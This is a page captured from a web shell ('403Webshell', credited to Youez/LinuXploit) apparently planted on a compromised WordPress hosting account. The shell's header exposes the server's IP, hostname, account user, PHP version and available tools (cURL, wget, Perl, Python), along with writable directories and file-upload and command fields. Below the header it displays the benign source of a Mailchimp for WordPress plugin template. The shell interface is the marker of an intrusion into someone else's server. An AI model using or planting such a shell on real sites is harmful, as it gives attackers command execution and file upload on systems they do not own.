403Webshell
Server IP : 51.91.236.193  /  Your IP : 216.73.216.224
Web Server : Apache
System : Linux webm010.cluster128.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
User : institutah ( 16501)
PHP Version : 7.2.34
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/institutah/www/wp-content/plugins/mailchimp-for-wp/includes/views/parts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/institutah/www/wp-content/plugins/mailchimp-for-wp/includes/views/parts/lists-overview.php
<h3><?php _e('Your Mailchimp Account', 'mailchimp-for-wp'); ?></h3>
<p><?php _e('The table below shows your Mailchimp lists and their details. If you just applied changes to your Mailchimp lists, please use the following button to renew the cached lists configuration.', 'mailchimp-for-wp'); ?></p>


<div id="mc4wp-list-fetcher">
	<form method="post" action="">
		<input type="hidden" name="_mc4wp_action" value="empty_lists_cache" />

		<p>
			<input type="submit" value="<?php _e('Renew Mailchimp lists', 'mailchimp-for-wp'); ?>" class="button" />
		</p>
	</form>
</div>

<div class="mc4wp-lists-overview">
	<?php if (empty($lists)) {
    ?>
		<p><?php _e('No lists were found in your Mailchimp account', 'mailchimp-for-wp'); ?>.</p>
	<?php
} else {
        printf('<p>' . __('A total of %d lists were found in your Mailchimp account.', 'mailchimp-for-wp') . '</p>', count($lists));

        echo '<table class="widefat striped" id="mc4wp-mailchimp-lists-overview">';

        $headings = array(
            __('List Name', 'mailchimp-for-wp'),
            __('ID', 'mailchimp-for-wp'),
            __('Subscribers', 'mailchimp-for-wp')
        );

        echo '<thead>';
        echo '<tr>';
        foreach ($headings as $heading) {
            echo sprintf('<th>%s</th>', $heading);
        }
        echo '</tr>';
        echo '</thead>';

        foreach ($lists as $list) {
            echo '<tr>';
            echo sprintf('<td><a href="#" class="mc4wp-mailchimp-list" data-list-id="%s">%s</a><span class="row-actions alignright"></span></td>', esc_attr($list->id), esc_html($list->name));
            echo sprintf('<td><code>%s</code></td>', esc_html($list->id));
            echo sprintf('<td>%s</td>', esc_html($list->stats->member_count));
            echo '</tr>';

            echo sprintf('<tr class="list-details list-%s-details" style="display: none;">', $list->id);
            echo '<td colspan="3" style="padding: 0 20px 40px;">';

            echo sprintf('<p class="alignright" style="margin: 20px 0;"><a href="https://admin.mailchimp.com/lists/members/?id=%s" target="_blank"><span class="dashicons dashicons-edit"></span> ' . __('Edit this list in Mailchimp', 'mailchimp-for-wp') . '</a></p>', $list->web_id);
            echo '<div><div>' . __('Loading... Please wait.', 'mailchimp-for-wp') . '</div></div>';
            echo '</td>';
            echo '</tr>'; ?>
		<?php
        } // end foreach $lists
        echo '</table>';
    } // end if empty?>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit